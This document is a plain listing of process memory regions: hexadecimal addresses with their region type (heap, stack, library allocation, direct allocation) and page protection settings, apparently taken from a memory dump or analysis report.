heap
page read and write
1FB15A17000
heap
page read and write
1FB1340D000
heap
page read and write
26F6D2B5000
heap
page read and write
1FB13D72000
heap
page read and write
1FB10DC7000
heap
page read and write
1FB153F5000
heap
page read and write
26F6D1EC000
heap
page read and write
1FB15C4E000
heap
page read and write
22081B42000
trusted library allocation
page read and write
1FB13DA8000
heap
page read and write
1FB131A6000
heap
page read and write
1AA63800000
heap
page read and write
220810DC000
trusted library allocation
page read and write
7FF848FD2000
trusted library allocation
page read and write
1FB132B3000
heap
page read and write
1FB12D70000
heap
page read and write
1FB12C71000
heap
page read and write
7FF848E4C000
trusted library allocation
page execute and read and write
1FB131C7000
heap
page read and write
7FF6350D0000
unkown
page readonly
1FB149E4000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
1FB13D84000
heap
page read and write
1FB139B2000
heap
page read and write
1FB13201000
heap
page read and write
1FB131C2000
heap
page read and write
1FB12DE4000
heap
page read and write
7FF6351DF000
unkown
page write copy
26F6D26B000
heap
page read and write
1FB139D4000
heap
page read and write
1FB14465000
heap
page read and write
1FB139BB000
heap
page read and write
7FF8491A0000
trusted library allocation
page read and write
220F879C000
heap
page read and write
1FB1341E000
heap
page read and write
1FB10DC1000
heap
page read and write
1FB165F8000
heap
page read and write
26F6F17D000
heap
page read and write
1FB13AA1000
heap
page read and write
1FB139D4000
heap
page read and write
26F6D23F000
heap
page read and write
26F6D207000
heap
page read and write
1FB14257000
heap
page read and write
1FB12E35000
heap
page read and write
1AA4D224000
trusted library allocation
page read and write
26F6D7FE000
heap
page read and write
1FB10DC8000
heap
page read and write
26F6D48B000
heap
page read and write
1FB16856000
heap
page read and write
1FB13BE6000
heap
page read and write
220FAB80000
heap
page read and write
1FB13E24000
heap
page read and write
1FB15A83000
heap
page read and write
1FB13AB2000
heap
page read and write
2714B835000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
1FB1661C000
heap
page read and write
1FB13D11000
heap
page read and write
1FB12DB6000
heap
page read and write
1FB16626000
heap
page read and write
2B85D1C0000
heap
page read and write
2B85D320000
heap
page read and write
1FB13A2D000
heap
page read and write
1D3FE9C5000
heap
page read and write
1FB12CCF000
heap
page read and write
1FB12D1A000
heap
page read and write
1FB152FD000
heap
page read and write
26F6D7E8000
heap
page read and write
1FB13A2D000
heap
page read and write
1FB12D1A000
heap
page read and write
7FF848DF2000
trusted library allocation
page read and write
1FB15A38000
heap
page read and write
1FB13690000
heap
page read and write
2714B82D000
heap
page read and write
1FB131DA000
heap
page read and write
1FB139BD000
heap
page read and write
1FB1673A000
heap
page read and write
1FB1426C000
heap
page read and write
1FB132FE000
heap
page read and write
1FB14475000
heap
page read and write
1FB12D79000
heap
page read and write
7FF848FD2000
trusted library allocation
page read and write
1FB15A4C000
heap
page read and write
220902FB000
trusted library allocation
page read and write
1AA49642000
heap
page read and write
7FF849184000
trusted library allocation
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
C258DF8000
stack
page read and write
220F86D3000
heap
page read and write
1FB139F9000
heap
page read and write
1FB139A0000
heap
page read and write
1FB12E08000
heap
page read and write
1AA63AE0000
heap
page read and write
1AA4C30F000
trusted library allocation
page read and write
1FB13BAD000
heap
page read and write
1FB1660C000
heap
page read and write
1FB13373000
heap
page read and write
2208125D000
trusted library allocation
page read and write
1FB15495000
heap
page read and write
22081323000
trusted library allocation
page read and write
1FB14361000
heap
page read and write
26F6D150000
heap
page read and write
1FB133C3000
heap
page read and write
227C6516000
heap
page read and write
7FF849146000
trusted library allocation
page read and write
1FB1691D000
heap
page read and write
1FB13359000
heap
page read and write
1FB15B24000
heap
page read and write
1FB167C8000
heap
page read and write
B46C6FF000
stack
page read and write
1FB139B2000
heap
page read and write
1FB12DDD000
heap
page read and write
1FB139A2000
heap
page read and write
1AA63B1E000
heap
page read and write
220F871D000
heap
page read and write
1FB13BA6000
heap
page read and write
26F6D230000
heap
page read and write
1AA4C32D000
trusted library allocation
page read and write
1FB15C03000
heap
page read and write
1FB131C3000
heap
page read and write
26F6D197000
heap
page read and write
1FB167AB000
heap
page read and write
1FB14006000
heap
page read and write
1FB13961000
heap
page read and write
1FB139D6000
heap
page read and write
1AA4B512000
heap
page read and write
1FB1436C000
heap
page read and write
1FB1683A000
heap
page read and write
1FB12DF1000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
1FB134A9000
heap
page read and write
1FB13BA8000
heap
page read and write
1FB13A35000
heap
page read and write
1FB15B39000
heap
page read and write
26F6D7DF000
heap
page read and write
1FB12D71000
heap
page read and write
1FB16964000
heap
page read and write
1FB12D70000
heap
page read and write
1AA63A9A000
heap
page read and write
26F6D299000
heap
page read and write
1FB10DF3000
heap
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
861B479000
stack
page read and write
220F8743000
heap
page read and write
1FB13A2D000
heap
page read and write
1FB12C9A000
heap
page read and write
1FB12BE0000
heap
page read and write
2714B80D000
heap
page read and write
1FB13314000
heap
page read and write
1AA4D2EA000
trusted library allocation
page read and write
2B85D244000
heap
page read and write
7FF6351DD000
unkown
page write copy
1AA63A52000
heap
page read and write
1FB139C3000
heap
page read and write
1FB16556000
heap
page read and write
7FF635370000
unkown
page read and write
C25917F000
stack
page read and write
1FB13239000
heap
page read and write
7FF7C919F000
unkown
page write copy
1FB1325B000
heap
page read and write
1FB16596000
heap
page read and write
220FA0C0000
trusted library allocation
page read and write
22080227000
trusted library allocation
page read and write
1FB167F2000
heap
page read and write
1FB10DCE000
heap
page read and write
1FB10DCE000
heap
page read and write
26F6D7FB000
heap
page read and write
1FB10DC8000
heap
page read and write
1FB139D2000
heap
page read and write
227C6798000
heap
page read and write
DB354F7000
stack
page read and write
1FB15249000
heap
page read and write
26F6D270000
heap
page read and write
1FB13D00000
heap
page read and write
1FB139D9000
heap
page read and write
1FB159A5000
heap
page read and write
26F6D234000
heap
page read and write
1FB13CD7000
heap
page read and write
1FB12D10000
heap
page read and write
1FB159F0000
heap
page read and write
1FB12C70000
heap
page read and write
DB3587B000
stack
page read and write
1AA49970000
heap
page read and write
1FB13A33000
heap
page read and write
DB3634E000
stack
page read and write
1AA4D3B3000
trusted library allocation
page read and write
220FA9EF000
heap
page read and write
1FB13171000
heap
page read and write
1FB13A9A000
heap
page read and write
1AA4D269000
trusted library allocation
page read and write
1FB12D70000
heap
page read and write
1FB10DCE000
heap
page read and write
1FB165F6000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
1FB15A92000
heap
page read and write
1FB16864000
heap
page read and write
1FB10DCE000
heap
page read and write
1FB12E0C000
heap
page read and write
1FB16801000
heap
page read and write
1FB139A4000
heap
page read and write
7FF848FD8000
trusted library allocation
page read and write
1FB15251000
heap
page read and write
C1D86FE000
stack
page read and write
1FB163ED000
heap
page read and write
26F6D230000
heap
page read and write
227C6430000
trusted library allocation
page read and write
1FB139E3000
heap
page read and write
1FB10DC2000
heap
page read and write
1AA63748000
heap
page read and write
1FB13981000
heap
page read and write
C1D8CFF000
stack
page read and write
1FB1336F000
heap
page read and write
1AA63B74000
heap
page read and write
1FB12C90000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
1FB12BE8000
heap
page read and write
26F6D207000
heap
page read and write
1FB154AB000
heap
page read and write
1FB10DF3000
heap
page read and write
1FB1392A000
heap
page read and write
1FB16588000
heap
page read and write
1FB13D16000
heap
page read and write
1FB15204000
heap
page read and write
1FB139EF000
heap
page read and write
227C6510000
heap
page read and write
861B07E000
stack
page read and write
220FAA57000
heap
page read and write
7FF635370000
unkown
page write copy
1FB10DCE000
heap
page read and write
1FB139CD000
heap
page read and write
2B85D0C0000
heap
page read and write
1FB139A0000
heap
page read and write
1FB12E30000
heap
page read and write
1FB1398F000
heap
page read and write
C1D85F7000
stack
page read and write
1FB13241000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
26F6D278000
heap
page read and write
1FB12C8F000
heap
page read and write
1FB139BB000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
1FB139BB000
heap
page read and write
1FB131DE000
heap
page read and write
7FF848FB0000
trusted library allocation
page execute and read and write
1FB139AA000
heap
page read and write
1FB139F9000
heap
page read and write
1AA63B6B000
heap
page read and write
1FB14514000
heap
page read and write
26F6D290000
heap
page read and write
2714B818000
heap
page read and write
220F86A0000
heap
page read and write
1FB13A2D000
heap
page read and write
1FB10DAB000
heap
page read and write
1FB139E2000
heap
page read and write
220814E8000
trusted library allocation
page read and write
1FB1446D000
heap
page read and write
1FB139E9000
heap
page read and write
1FB1392A000
heap
page read and write
1FB139C9000
heap
page read and write
C1D91FA000
stack
page read and write
7FF6350D1000
unkown
page execute read
26F6D7ED000
heap
page read and write
1FB139BB000
heap
page read and write
1FB139E3000
heap
page read and write
26F6D1D7000
heap
page read and write
1FB152C7000
heap
page read and write
1FB15A6D000
heap
page read and write
1FB15B64000
heap
page read and write
1FB16572000
heap
page read and write
1FB15A54000
heap
page read and write
1FB12C76000
heap
page read and write
1FB10DF3000
heap
page read and write
1FB13993000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
1FB13D70000
heap
page read and write
861B1FE000
stack
page read and write
2208140E000
trusted library allocation
page read and write
1FB12D1A000
heap
page read and write
1FB13D84000
heap
page read and write
1FB13ADA000
heap
page read and write
7FF8491C0000
trusted library allocation
page read and write
7FF848E0B000
trusted library allocation
page read and write
7FF8490F0000
trusted library allocation
page read and write
1FB15335000
heap
page read and write
1FB142B7000
heap
page read and write
26F6D7FE000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
7FF7C7D21000
unkown
page execute read
7FF7C7D20000
unkown
page readonly
1FB10DC8000
heap
page read and write
DB35678000
stack
page read and write
1FB139F3000
heap
page read and write
1FB10DC1000
heap
page read and write
7FF848DF0000
trusted library allocation
page read and write
1FB13445000
heap
page read and write
2B85D425000
heap
page read and write
1FB10DF3000
heap
page read and write
220FAA72000
heap
page read and write
1FB12DC7000
heap
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
26F6F160000
heap
page read and write
7DF405570000
trusted library allocation
page execute and read and write
7FF6351E1000
unkown
page readonly
22081224000
trusted library allocation
page read and write
220F8680000
heap
page read and write
1FB13B94000
heap
page read and write
1FB12C88000
heap
page read and write
1FB13A1D000
heap
page read and write
1FB1520C000
heap
page read and write
1FB13413000
heap
page read and write
26F6D299000
heap
page read and write
1FB139E2000
heap
page read and write
1FB15575000
heap
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
220FA8F0000
heap
page read and write
7FF848F92000
trusted library allocation
page read and write
1FB12CE8000
heap
page read and write
1FB16552000
heap
page read and write
1FB10E1A000
heap
page read and write
1FB13995000
heap
page read and write
220FA921000
heap
page read and write
1FB12E47000
heap
page read and write
227C6430000
trusted library allocation
page read and write
220FA8A0000
heap
page execute and read and write
7FF848FAA000
trusted library allocation
page read and write
1FB12DFD000
heap
page read and write
1FB12CB0000
heap
page read and write
1FB14484000
heap
page read and write
1FB13FDC000
heap
page read and write
1FB13CCF000
heap
page read and write
1FB1520A000
heap
page read and write
1FB153B5000
heap
page read and write
1FB16631000
heap
page read and write
1FB12D70000
heap
page read and write
1FB16594000
heap
page read and write
1FB139D2000
heap
page read and write
1AA63B04000
heap
page read and write
220F86C0000
heap
page read and write
1FB13D48000
heap
page read and write
1FB1399B000
heap
page read and write
1FB13881000
heap
page read and write
1FB13D7D000
heap
page read and write
1FB15A8F000
heap
page read and write
7FF8491B0000
trusted library allocation
page read and write
1FB12B10000
trusted library allocation
page read and write
1FB139AA000
heap
page read and write
861C1CC000
stack
page read and write
1FB13A2D000
heap
page read and write
1FB14321000
heap
page read and write
1FB15A06000
heap
page read and write
1FB14357000
heap
page read and write
1FB131C9000
heap
page read and write
C1D92FF000
stack
page read and write
7FF7C9175000
unkown
page write copy
7FF8490B0000
trusted library allocation
page read and write
7FF7C8EC9000
unkown
page readonly
1FB13182000
heap
page read and write
1FB13995000
heap
page read and write
220FA92E000
heap
page read and write
1FB13D4C000
heap
page read and write
26F6D7ED000
heap
page read and write
26F6D2A2000
heap
page read and write
7FF849198000
trusted library allocation
page read and write
1AA5B701000
trusted library allocation
page read and write
1FB16586000
heap
page read and write
1FB12D65000
heap
page read and write
26F6D7F8000
heap
page read and write
1FB139AA000
heap
page read and write
1FB13CEE000
heap
page read and write
1FB142AC000
heap
page read and write
7FF849240000
trusted library allocation
page read and write
1FB152B3000
heap
page read and write
1FB13D9E000
heap
page read and write
227C6410000
heap
page read and write
1FB12D3E000
heap
page read and write
26F6D2B1000
heap
page read and write
2B85D420000
heap
page read and write
1FB139AA000
heap
page read and write
1FB12EE7000
heap
page read and write
1FB1658F000
heap
page read and write
1FB12E1F000
heap
page read and write
1AA5B9D6000
trusted library allocation
page read and write
220F8749000
heap
page read and write
1FB10DF3000
heap
page read and write
1FB12C90000
heap
page read and write
1FB15B44000
heap
page read and write
1AA63A25000
heap
page read and write
1FB148F1000
heap
page read and write
1FB13E1E000
heap
page read and write
7FF6350D1000
unkown
page execute read
1FB13980000
heap
page read and write
7FF84919A000
trusted library allocation
page read and write
26F6D2B4000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
1FB13A19000
heap
page read and write
22090001000
trusted library allocation
page read and write
1FB13690000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
1FB13967000
heap
page read and write
1FB139BB000
heap
page read and write
26F6D262000
heap
page read and write
26F6D195000
heap
page read and write
1FB16701000
heap
page read and write
1FB13A82000
heap
page read and write
220FA240000
heap
page read and write
1FB12B50000
heap
page read and write
1FB13E68000
heap
page read and write
1FB1337D000
heap
page read and write
1FB1396A000
heap
page read and write
7FF848E4C000
trusted library allocation
page execute and read and write
7FF6350D0000
unkown
page readonly
C25907D000
stack
page read and write
1FB16748000
heap
page read and write
1FB1660F000
heap
page read and write
1FB12DF4000
heap
page read and write
1FB13E3E000
heap
page read and write
1FB13425000
heap
page read and write
26F6D2A7000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
1FB133FA000
heap
page read and write
1FB12C9A000
heap
page read and write
1FB16848000
heap
page read and write
1FB12DD8000
heap
page read and write
1FB139EE000
heap
page read and write
7EF4BAB6F000
direct allocation
page read and write
1FB1320C000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
1FB1656B000
heap
page read and write
1FB16611000
heap
page read and write
26F6D120000
trusted library allocation
page read and write
1FB169C8000
heap
page read and write
1FB1662A000
heap
page read and write
26F6D2A4000
heap
page read and write
1FB12C87000
heap
page read and write
1FB139BB000
heap
page read and write
1AA637B2000
heap
page read and write
1FB13245000
heap
page read and write
1FB13293000
heap
page read and write
1FB140A6000
heap
page read and write
1FB13962000
heap
page read and write
1FB1398E000
heap
page read and write
1FB15895000
heap
page read and write
1FB159E2000
heap
page read and write
7FF84919C000
trusted library allocation
page read and write
DB357FF000
stack
page read and write
1FB139B2000
heap
page read and write
1FB13183000
heap
page read and write
220902F6000
trusted library allocation
page read and write
26F6D23A000
heap
page read and write
1FB131E4000
heap
page read and write
7FF6350D0000
unkown
page readonly
1FB139C3000
heap
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
1AA5B711000
trusted library allocation
page read and write
DB355FB000
stack
page read and write
1FB10DF3000
heap
page read and write
1AA5B9DC000
trusted library allocation
page read and write
1AA4CCD6000
trusted library allocation
page read and write
1FB10F10000
heap
page read and write
7FF848FAA000
trusted library allocation
page read and write
1AA63827000
heap
page read and write
7FF849250000
trusted library allocation
page execute and read and write
1FB133CB000
heap
page read and write
1FB139CD000
heap
page read and write
1FB13361000
heap
page read and write
26F6D232000
heap
page read and write
1FB12DD3000
heap
page read and write
1FB13A5D000
heap
page read and write
C1D85ED000
stack
page read and write
1FB139BB000
heap
page read and write
1FB13B88000
heap
page read and write
1FB1680F000
heap
page read and write
1FB13A43000
heap
page read and write
1FB139AA000
heap
page read and write
26F6D1EC000
heap
page read and write
1FB12C90000
heap
page read and write
1FB12CB1000
heap
page read and write
1FB139E0000
heap
page read and write
1FB12D65000
heap
page read and write
1FB1661F000
heap
page read and write
1FB12D70000
heap
page read and write
1FB13ABA000
heap
page read and write
26F6D7E8000
heap
page read and write
1FB15A60000
heap
page read and write
1AA4B0B0000
heap
page read and write
1AA4B040000
trusted library allocation
page read and write
1FB13C9F000
heap
page read and write
1FB15B2C000
heap
page read and write
1AA4CD98000
trusted library allocation
page read and write
1FB13A19000
heap
page read and write
1FB12D65000
heap
page read and write
220FA1F0000
heap
page execute and read and write
1FB12E2F000
heap
page read and write
1FB13981000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
1FB15C39000
heap
page read and write
1FB139DA000
heap
page read and write
26F6D7DC000
heap
page read and write
1FB1331C000
heap
page read and write
1FB15B8E000
heap
page read and write
1FB159A3000
heap
page read and write
1FB139CF000
heap
page read and write
1FB10DCE000
heap
page read and write
1FB12E26000
heap
page read and write
1FB12C71000
heap
page read and write
26F6D223000
heap
page read and write
1FB10DC8000
heap
page read and write
1FB139FC000
heap
page read and write
1FB1662C000
heap
page read and write
1FB13409000
heap
page read and write
1FB1654D000
heap
page read and write
1FB13968000
heap
page read and write
7FF84927A000
trusted library allocation
page read and write
1FB10E07000
heap
page read and write
861C34E000
stack
page read and write
1FB16956000
heap
page read and write
1FB13CEA000
heap
page read and write
26F6D225000
heap
page read and write
1AA637B8000
heap
page read and write
1FB13995000
heap
page read and write
1FB139C3000
heap
page read and write
1FB15C2E000
heap
page read and write
1FB166AB000
heap
page read and write
1FB139D2000
heap
page read and write
26F6D22E000
heap
page read and write
26F6D262000
heap
page read and write
1FB13BFD000
heap
page read and write
1FB13D89000
heap
page read and write
1FB16558000
heap
page read and write
1FB15B4E000
heap
page read and write
227C6785000
heap
page read and write
DB35579000
stack
page read and write
1FB1552B000
heap
page read and write
2208104C000
trusted library allocation
page read and write
1AA4B767000
trusted library allocation
page read and write
1AA4C7E7000
trusted library allocation
page read and write
1FB12DEF000
heap
page read and write
1FB131A7000
heap
page read and write
1FB12DAD000
heap
page read and write
1FB12DDB000
heap
page read and write
7FF8491C0000
trusted library allocation
page read and write
220F8745000
heap
page read and write
7FF849220000
trusted library allocation
page read and write
7EF4BFB6F000
direct allocation
page read and write
220FA177000
heap
page execute and read and write
1FB152E5000
heap
page read and write
861B77B000
stack
page read and write
7FF849250000
trusted library allocation
page execute and read and write
1FB139D3000
heap
page read and write
1FB1396B000
heap
page read and write
1AA639E0000
heap
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
1D3FE758000
heap
page read and write
26F6D19B000
heap
page read and write
26F6D19A000
heap
page read and write
1FB12B30000
heap
page read and write
1FB139D4000
heap
page read and write
1FB12D18000
heap
page read and write
1FB13289000
heap
page read and write
1FB12B10000
trusted library allocation
page read and write
7FF849150000
trusted library allocation
page read and write
1FB15244000
heap
page read and write
220FA170000
heap
page execute and read and write
1FB139A0000
heap
page read and write
1AA639F0000
heap
page read and write
22090304000
trusted library allocation
page read and write
DB3654E000
stack
page read and write
1FB1660A000
heap
page read and write
1FB12E87000
heap
page read and write
1AA49608000
heap
page read and write
1FB15A1C000
heap
page read and write
26F6D2BA000
heap
page read and write
1FB10E1A000
heap
page read and write
1FB16613000
heap
page read and write
1AA4C758000
trusted library allocation
page read and write
1FB13CBB000
heap
page read and write
1FB16582000
heap
page read and write
1FB14342000
heap
page read and write
7FF7C8F07000
unkown
page write copy
1FB13E93000
heap
page read and write
1FB10E1B000
heap
page read and write
1FB1672B000
heap
page read and write
1FB139F5000
heap
page read and write
26F6D194000
heap
page read and write
1FB16901000
heap
page read and write
1FB165FC000
heap
page read and write
1FB12C80000
heap
page read and write
1FB10DF3000
heap
page read and write
1FB10E1B000
heap
page read and write
7FF7C92B6000
unkown
page write copy
1FB152F1000
heap
page read and write
1FB12E00000
heap
page read and write
1FB133D3000
heap
page read and write
1FB16618000
heap
page read and write
7EF4BF16F000
direct allocation
page read and write
1FB10DC8000
heap
page read and write
1FB13A2E000
heap
page read and write
22080C3F000
trusted library allocation
page read and write
7DF405590000
trusted library allocation
page execute and read and write
1FB139E2000
heap
page read and write
1FB12C77000
heap
page read and write
1FB139D2000
heap
page read and write
1FB143D5000
heap
page read and write
7EF4BD36F000
direct allocation
page read and write
1FB10E15000
heap
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
26F6D192000
heap
page read and write
1FB131F5000
heap
page read and write
1FB12D76000
heap
page read and write
1FB131D0000
heap
page read and write
1FB13B8E000
heap
page read and write
1FB12C72000
heap
page read and write
1AA63B4E000
heap
page read and write
7FF6351DF000
unkown
page write copy
1FB13A07000
heap
page read and write
1AA4B0B5000
heap
page read and write
F71B92C000
stack
page read and write
1FB16772000
heap
page read and write
1FB1396C000
heap
page read and write
861B4F8000
stack
page read and write
1FB139E4000
heap
page read and write
1FB139A2000
heap
page read and write
1FB1671D000
heap
page read and write
1FB12E0B000
heap
page read and write
220812F2000
trusted library allocation
page read and write
1FB16608000
heap
page read and write
1FB13DA4000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
26F6D193000
heap
page read and write
1FB13C97000
heap
page read and write
1FB12C72000
heap
page read and write
1FB10E19000
heap
page read and write
7FF635371000
unkown
page write copy
220FA060000
heap
page read and write
1FB140AE000
heap
page read and write
1FB12E26000
heap
page read and write
7DF405580000
trusted library allocation
page execute and read and write
1FB10DCE000
heap
page read and write
1FB16651000
heap
page read and write
861B179000
stack
page read and write
1FB139A4000
heap
page read and write
26F6D7F9000
heap
page read and write
1FB131CA000
heap
page read and write
1AA4CAEE000
trusted library allocation
page read and write
1FB13E0C000
heap
page read and write
1FB15AA4000
heap
page read and write
1FB143BD000
heap
page read and write
1FB13E88000
heap
page read and write
1FB139B2000
heap
page read and write
1FB10DCE000
heap
page read and write
1AA4B906000
trusted library allocation
page read and write
1FB1334C000
heap
page read and write
1AA4B000000
heap
page readonly
1FB1690F000
heap
page read and write
1AA49600000
heap
page read and write
22081B87000
trusted library allocation
page read and write
26F6D25B000
heap
page read and write
1FB13A35000
heap
page read and write
7FF849230000
trusted library allocation
page read and write
7FF7C919B000
unkown
page write copy
1FB10DC1000
heap
page read and write
1FB12F2D000
heap
page read and write
26F6D7F8000
heap
page read and write
1FB16562000
heap
page read and write
1AA4C177000
trusted library allocation
page read and write
1FB13A88000
heap
page read and write
26F6F174000
heap
page read and write
1FB16781000
heap
page read and write
227C6430000
trusted library allocation
page read and write
1FB1546A000
heap
page read and write
1AA4B6D0000
heap
page execute and read and write
1FB139CD000
heap
page read and write
1FB14145000
heap
page read and write
1FB15400000
heap
page read and write
26F6D7E0000
heap
page read and write
26F6D0E0000
heap
page read and write
1FB13E48000
heap
page read and write
26F6D808000
heap
page read and write
26F6D100000
heap
page read and write
1FB139AA000
heap
page read and write
1FB133DB000
heap
page read and write
1FB13981000
heap
page read and write
1FB139D6000
heap
page read and write
861B57E000
stack
page read and write
220F8701000
heap
page read and write
1FB13406000
heap
page read and write
1FB139D2000
heap
page read and write
7FF848FF0000
trusted library allocation
page read and write
1FB139C3000
heap
page read and write
DB363C9000
stack
page read and write
26F6D1E3000
heap
page read and write
220FA9DE000
heap
page read and write
7FF848FF0000
trusted library allocation
page read and write
DB3547D000
stack
page read and write
1FB10DF3000
heap
page read and write
1FB1424A000
heap
page read and write
1FB12D78000
heap
page read and write
22081B8C000
trusted library allocation
page read and write
22080F3A000
trusted library allocation
page read and write
1FB12C9A000
heap
page read and write
1FB1679D000
heap
page read and write
1FB16554000
heap
page read and write
1FB16761000
heap
page read and write
1FB1530B000
heap
page read and write
1FB13A6D000
heap
page read and write
1FB12AE0000
remote allocation
page read and write
227C6780000
heap
page read and write
1FB148F1000
heap
page read and write
1FB1399C000
heap
page read and write
1FB13393000
heap
page read and write
1FB139FC000
heap
page read and write
26F6D2A2000
heap
page read and write
1FB13231000
heap
page read and write
1AA49975000
heap
page read and write
1FB12DAE000
heap
page read and write
1FB13309000
heap
page read and write
1FB13D8C000
heap
page read and write
1FB1658D000
heap
page read and write
1AA4D26E000
trusted library allocation
page read and write
7FF849270000
trusted library allocation
page read and write
1FB13998000
heap
page read and write
1FB12BD8000
heap
page read and write
1FB13D56000
heap
page read and write
1FB139D2000
heap
page read and write
26F6D23A000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
1AA4C4A3000
trusted library allocation
page read and write
C1D8AFE000
stack
page read and write
1FB139A2000
heap
page read and write
1AA4C9D2000
trusted library allocation
page read and write
1FB12E30000
heap
page read and write
220811A7000
trusted library allocation
page read and write
1FB16574000
heap
page read and write
1FB132A9000
heap
page read and write
26F6D7E4000
heap
page read and write
1D3FE660000
heap
page read and write
1FB12B1E000
heap
page read and write
1FB13A2D000
heap
page read and write
1FB13188000
heap
page read and write
1AA5B74D000
trusted library allocation
page read and write
1FB10DB5000
heap
page read and write
22081C08000
trusted library allocation
page read and write
1AA4B500000
heap
page read and write
1FB12DD2000
heap
page read and write
1FB12E2F000
heap
page read and write
1FB131E3000
heap
page read and write
1FB12D10000
heap
page read and write
26F6D24A000
heap
page read and write
861B5FF000
stack
page read and write
1FB10E07000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
1FB10DF3000
heap
page read and write
1FB1327B000
heap
page read and write
1AA4C902000
trusted library allocation
page read and write
1FB168D6000
heap
page read and write
1FB10DF3000
heap
page read and write
1FB15C44000
heap
page read and write
1FB1399A000
heap
page read and write
26F6D235000
heap
page read and write
22081B67000
trusted library allocation
page read and write
1FB13BC6000
heap
page read and write
1FB169D6000
heap
page read and write
227C651C000
heap
page read and write
1FB12CC8000
heap
page read and write
1FB1655B000
heap
page read and write
1FB139AA000
heap
page read and write
26F6D20A000
heap
page read and write
1FB139E3000
heap
page read and write
1FB12E5F000
heap
page read and write
26F6D7F8000
heap
page read and write
1FB13C9D000
heap
page read and write
1FB12D05000
heap
page read and write
220FAA4B000
heap
page read and write
7FF6351E1000
unkown
page readonly
1FB12C96000
heap
page read and write
1AA63B69000
heap
page read and write
7FF635374000
unkown
page readonly
1FB16568000
heap
page read and write
1FB1525B000
heap
page read and write
1FB139CD000
heap
page read and write
1FB13A2D000
heap
page read and write
1FB16584000
heap
page read and write
220FA0A0000
trusted library allocation
page read and write
26F6D24A000
heap
page read and write
1FB139D2000
heap
page read and write
1FB13189000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
1FB139C3000
heap
page read and write
1FB12DAE000
heap
page read and write
7FF7C9171000
unkown
page readonly
1FB13C6D000
heap
page read and write
1FB139A4000
heap
page read and write
1FB10DF3000
heap
page read and write
7FF849189000
trusted library allocation
page read and write
1AA49686000
heap
page read and write
220FA594000
heap
page read and write
1FB131EC000
heap
page read and write
8652FFE000
stack
page read and write
1AA4B640000
heap
page execute and read and write
1FB12E4F000
heap
page read and write
1FB10DC2000
heap
page read and write
227C6798000
heap
page read and write
26F6D000000
heap
page read and write
1FB139E2000
heap
page read and write
1FB139D2000
heap
page read and write
1FB10DCB000
heap
page read and write
22080A96000
trusted library allocation
page read and write
1FB10DF3000
heap
page read and write
1FB12C71000
heap
page read and write
26F6D22A000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
1FB12E02000
heap
page read and write
1FB16578000
heap
page read and write
1FB16873000
heap
page read and write
1D3FE850000
heap
page read and write
1FB10DCE000
heap
page read and write
1FB12C8F000
heap
page read and write
1FB139AA000
heap
page read and write
1AA4BBF2000
trusted library allocation
page read and write
1FB13995000
heap
page read and write
1FB13338000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
1FB10DC8000
heap
page read and write
861B0FE000
stack
page read and write
1FB131D5000
heap
page read and write
1FB12E1F000
heap
page read and write
1FB133E8000
heap
page read and write
1FB15A4E000
heap
page read and write
1FB14262000
heap
page read and write
26F6D19A000
heap
page read and write
1FB1656F000
heap
page read and write
1FB10DCE000
heap
page read and write
1FB1692B000
heap
page read and write
1FB13A65000
heap
page read and write
1FB133AF000
heap
page read and write
1AA49612000
heap
page read and write
1FB13A2D000
heap
page read and write
1FB139AA000
heap
page read and write
1FB12C60000
heap
page read and write
1FB1402E000
heap
page read and write
1FB12DDF000
heap
page read and write
220F8670000
heap
page read and write
1FB13277000
heap
page read and write
1FB139FC000
heap
page read and write
1FB15B99000
heap
page read and write
1FB139EF000
heap
page read and write
1AA63B00000
heap
page read and write
1FB12C9A000
heap
page read and write
26F6D1E7000
heap
page read and write
7EF4BB56F000
direct allocation
page read and write
1FB139F9000
heap
page read and write
220FAA6D000
heap
page read and write
1FB152DD000
heap
page read and write
1FB13A19000
heap
page read and write
C1D88FF000
stack
page read and write
7FF849080000
trusted library allocation
page read and write
1FB14242000
heap
page read and write
1FB140B5000
heap
page read and write
1FB13A3D000
heap
page read and write
26F6D120000
trusted library allocation
page read and write
26F6D233000
heap
page read and write
7FF84919C000
trusted library allocation
page read and write
1FB12D70000
heap
page read and write
1FB139C3000
heap
page read and write
1FB139B2000
heap
page read and write
26F6D7ED000
heap
page read and write
22081078000
trusted library allocation
page read and write
1FB12DEA000
heap
page read and write
1AA4C84B000
trusted library allocation
page read and write
1FB12DF1000
heap
page read and write
1FB10DC8000
heap
page read and write
26F6D208000
heap
page read and write
1FB13C56000
heap
page read and write
1FB16616000
heap
page read and write
1FB16636000
heap
page read and write
1FB13D64000
heap
page read and write
26F6D485000
heap
page read and write
1FB13353000
heap
page read and write
26F6D7E4000
heap
page read and write
1FB12CA2000
heap
page read and write
26F6D190000
heap
page read and write
1FB13A19000
heap
page read and write
1FB139A2000
heap
page read and write
1FB1524B000
heap
page read and write
1AA4CCB0000
trusted library allocation
page read and write
1FB10DC6000
heap
page read and write
26F6D222000
heap
page read and write
1FB13274000
heap
page read and write
1FB1396C000
heap
page read and write
1FB13A19000
heap
